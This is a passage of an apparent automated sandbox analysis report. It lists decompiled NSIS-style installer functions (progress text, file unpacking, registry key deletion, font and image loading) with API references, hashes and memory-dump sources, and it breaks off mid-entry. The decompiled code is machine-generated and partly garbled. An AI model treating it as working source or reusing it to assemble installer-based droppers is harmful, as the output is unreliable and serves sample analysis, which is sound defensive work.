                                                                    • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                    • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                    • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                    0x00402dc7
                                                                    0x00402dd5
                                                                    0x00402ddb
                                                                    0x00402ddb
                                                                    0x00402de9
                                                                    0x00402deb
                                                                    0x00402df7
                                                                    0x00402dfc
                                                                    0x00402dfe
                                                                    0x00402dfe
                                                                    0x00402e09
                                                                    0x00402e19
                                                                    0x00402e2b
                                                                    0x00402e2b
                                                                    0x00402e33

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                    • API String ID: 1451636040-1158693248
                                                                    • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                    • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                    • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                    • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                    0x004027df
                                                                    0x004027e1
                                                                    0x004027ed
                                                                    0x004027f0
                                                                    0x004027fa
                                                                    0x004027fe
                                                                    0x004027fe
                                                                    0x00402804
                                                                    0x00402811
                                                                    0x00402819
                                                                    0x0040281c
                                                                    0x00402822
                                                                    0x00402830
                                                                    0x00402835
                                                                    0x00402839
                                                                    0x0040283c
                                                                    0x00402845
                                                                    0x00402851
                                                                    0x00402855
                                                                    0x00402858
                                                                    0x00402862
                                                                    0x00402887
                                                                    0x00402869
                                                                    0x0040286e
                                                                    0x00402876
                                                                    0x0040287c
                                                                    0x00402881
                                                                    0x00402881
                                                                    0x0040288e
                                                                    0x0040288e
                                                                    0x0040289b
                                                                    0x004028a1
                                                                    0x004028b3
                                                                    0x004028b3
                                                                    0x004028b9
                                                                    0x004028b9
                                                                    0x004028c4
                                                                    0x004028c5
                                                                    0x004028c9
                                                                    0x004028cd
                                                                    0x004028d3
                                                                    0x004028d3
                                                                    0x004028da
                                                                    0x004022dd
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                    • GlobalFree.KERNEL32 ref: 0040288E
                                                                    • GlobalFree.KERNEL32 ref: 004028A1
                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: be02276d34b52aff680f2bf82877302e2ab7172cbc5be37e117c6ddc7b4cc79d
                                                                    • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                    • Opcode Fuzzy Hash: be02276d34b52aff680f2bf82877302e2ab7172cbc5be37e117c6ddc7b4cc79d
                                                                    • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                    0x00402cdb
                                                                    0x00402ce4
                                                                    0x00402ced
                                                                    0x00402cf9
                                                                    0x00402d02
                                                                    0x00402d0c
                                                                    0x00402d31
                                                                    0x00402d37
                                                                    0x00402d3c
                                                                    0x00402d3d
                                                                    0x00402d6d
                                                                    0x00402d46
                                                                    0x00402d48
                                                                    0x00402d98
                                                                    0x00402d9b
                                                                    0x00000000
                                                                    0x00402da1
                                                                    0x00402d57
                                                                    0x00402d5c
                                                                    0x00402d5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d66
                                                                    0x00402d6b
                                                                    0x00402d6c
                                                                    0x00402d6c
                                                                    0x00402d79
                                                                    0x00402d81
                                                                    0x00402d88
                                                                    0x00000000
                                                                    0x00402db1
                                                                    0x00000000
                                                                    0x00402d90
                                                                    0x00402d1c
                                                                    0x00402d2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d2f
                                                                    0x00402db7

                                                                    APIs
                                                                    • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                    • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                    • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                    • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                    0x00401d65
                                                                    0x00401d69
                                                                    0x00401d7e
                                                                    0x00401d6b
                                                                    0x00401d6d
                                                                    0x00401d73
                                                                    0x00401d73
                                                                    0x00401d84
                                                                    0x00401d87
                                                                    0x00401d91
                                                                    0x00401d94
                                                                    0x00401d9c
                                                                    0x00401dad
                                                                    0x00401db0
                                                                    0x00401dbb
                                                                    0x00401db2
                                                                    0x00401db4
                                                                    0x00401db4
                                                                    0x00401dbf
                                                                    0x00401dcc
                                                                    0x00401df3
                                                                    0x00401e02
                                                                    0x00401e10
                                                                    0x00401e18
                                                                    0x00401e20
                                                                    0x00401e20
                                                                    0x00401e29
                                                                    0x00401e2f
                                                                    0x004029a5
                                                                    0x004029a5
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                    • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                    • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                    • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                    0x00401e35
                                                                    0x00401e40
                                                                    0x00401e42
                                                                    0x00401e4f
                                                                    0x00401e66
                                                                    0x00401e6b
                                                                    0x00401e78
                                                                    0x00401e7d
                                                                    0x00401e81
                                                                    0x00401e8c
                                                                    0x00401e93
                                                                    0x00401ea5
                                                                    0x00401eab
                                                                    0x00401eb0
                                                                    0x00401eba
                                                                    0x00402620
                                                                    0x00401569
                                                                    0x004029a5
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E38
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                    • ReleaseDC.USER32 ref: 00401E6B
                                                                    • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                    • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                    • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                    • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}



















                                                                    0x00404b20
                                                                    0x00404b25
                                                                    0x00404b2d
                                                                    0x00404b2e
                                                                    0x00404b3b
                                                                    0x00404b43
                                                                    0x00404b44
                                                                    0x00404b46
                                                                    0x00404b48
                                                                    0x00404b4a
                                                                    0x00404b4d
                                                                    0x00404b4d
                                                                    0x00404b54
                                                                    0x00404b5a
                                                                    0x00404b5a
                                                                    0x00404b61
                                                                    0x00404b68
                                                                    0x00404b6b
                                                                    0x00404b6e
                                                                    0x00404b6e
                                                                    0x00404b72
                                                                    0x00404b82
                                                                    0x00404b84
                                                                    0x00404b87
                                                                    0x00404b30
                                                                    0x00404b30
                                                                    0x00404b37
                                                                    0x00404b37
                                                                    0x00404b8f
                                                                    0x00404b9a
                                                                    0x00404bb0
                                                                    0x00404bc0
                                                                    0x00404bdc

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                    • wsprintfA.USER32 ref: 00404BC0
                                                                    • SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                    • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                    • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                    • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 59%
                                                                    			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                    0x00401c2e
                                                                    0x00401c30
                                                                    0x00401c37
                                                                    0x00401c3a
                                                                    0x00401c3d
                                                                    0x00401c47
                                                                    0x00401c4b
                                                                    0x00401c4e
                                                                    0x00401c57
                                                                    0x00401c57
                                                                    0x00401c5a
                                                                    0x00401c5e
                                                                    0x00401c67
                                                                    0x00401c67
                                                                    0x00401c6a
                                                                    0x00401c6e
                                                                    0x00401c70
                                                                    0x00401cc5
                                                                    0x00401cc7
                                                                    0x00401cd0
                                                                    0x00401cd8
                                                                    0x00401cdb
                                                                    0x00401cdb
                                                                    0x00401ce4
                                                                    0x00000000
                                                                    0x00401c72
                                                                    0x00401c79
                                                                    0x00401c7b
                                                                    0x00401c7e
                                                                    0x00401c84
                                                                    0x00401c8b
                                                                    0x00401c8e
                                                                    0x00401cb6
                                                                    0x00401cea
                                                                    0x00401cea
                                                                    0x00401c90
                                                                    0x00401c9e
                                                                    0x00401ca6
                                                                    0x00401ca9
                                                                    0x00401ca9
                                                                    0x00401c8e
                                                                    0x00401ced
                                                                    0x00401cf0
                                                                    0x00401cf6
                                                                    0x004029a5
                                                                    0x004029a5
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                    • SendMessageA.USER32 ref: 00401CB6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
